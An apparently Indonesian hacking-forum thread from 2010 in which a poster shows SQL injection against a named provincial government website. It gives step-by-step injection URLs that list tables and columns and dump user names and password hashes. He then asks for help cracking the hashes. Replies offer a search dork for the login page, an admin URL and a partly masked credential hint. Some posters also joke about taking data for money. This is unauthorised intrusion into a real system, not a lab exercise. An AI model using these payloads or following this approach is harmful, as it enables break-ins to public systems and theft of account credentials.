Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Posted: **Tue May 11, 2010 8:58 pm**

thread ini saya buat untuk menggantikan postingan saya tentang sqli di http://www.nexian.co.id/,
ok langsung aja, karena bug sqli di situs di http://www.nexian.co.id/ udah di patch maka saya coba nyari situs yg lain, terus ketemu deh bug sqli di http://bantenprov.go.id/

ini dia holenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=6932'

trus saya injeksi, dpat deh isi tablenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=database%28%29--

ini isi column dari table pengguna

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.columns%20where%20table_name=0x70656e6767756e61%20%20--

dan ini dia hasilnya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28user_name,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20pengguna

tapi sayangnya saya belum dapat login pagenya dan hashnya tidak berhasil saya crack, tolong bantuannya ya
:kaca: :kaca: :kaca:

Posted: **Wed May 12, 2010 7:13 am**

Search with Google using this keyword:
login site:bantenprov.go.id

Posted: **Wed May 12, 2010 8:16 am**

hashnya sulit di crack mas

Posted: **Thu May 13, 2010 9:07 pm**

monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

Posted: **Fri May 14, 2010 8:39 am**

win32error wrote:monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

Code: Select all

$nslookup banten.go.id
Non-authoritative answer:
Name:	banten.go.id
Address: 69.175.104.74

$nslookup bantenprov.go.id
Non-authoritative answer:
Name:	bantenprov.go.id
Address: 118.97.113.84

Jumping machine to machine...???
Itu cmn di redirect dari web lama ke yg baru

Posted: **Fri May 14, 2010 9:43 am**

jadi gitu to ... :circle:

Posted: **Fri May 14, 2010 10:37 pm**

terima kasih atas pencerahannya,
:malumalu: :malumalu: :malumalu:

tapi hashnya masih belum berhasil saya crack
:kaca: :kaca: :kaca:

Posted: **Fri May 14, 2010 11:29 pm**

wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

Posted: **Sat May 15, 2010 9:24 pm**

Digital Cat wrote:wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:

Posted: **Sun May 16, 2010 7:28 am**

cyber_terror1st wrote:
Digital Cat wrote:wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:

kalo ada duitnya c monggo2 aja .. hehehehe :ngakak: :ngakak:

Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

hole di http://bantenprov.go.id/ untuk sqli

hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli

Re: hole di http://bantenprov.go.id/ untuk sqli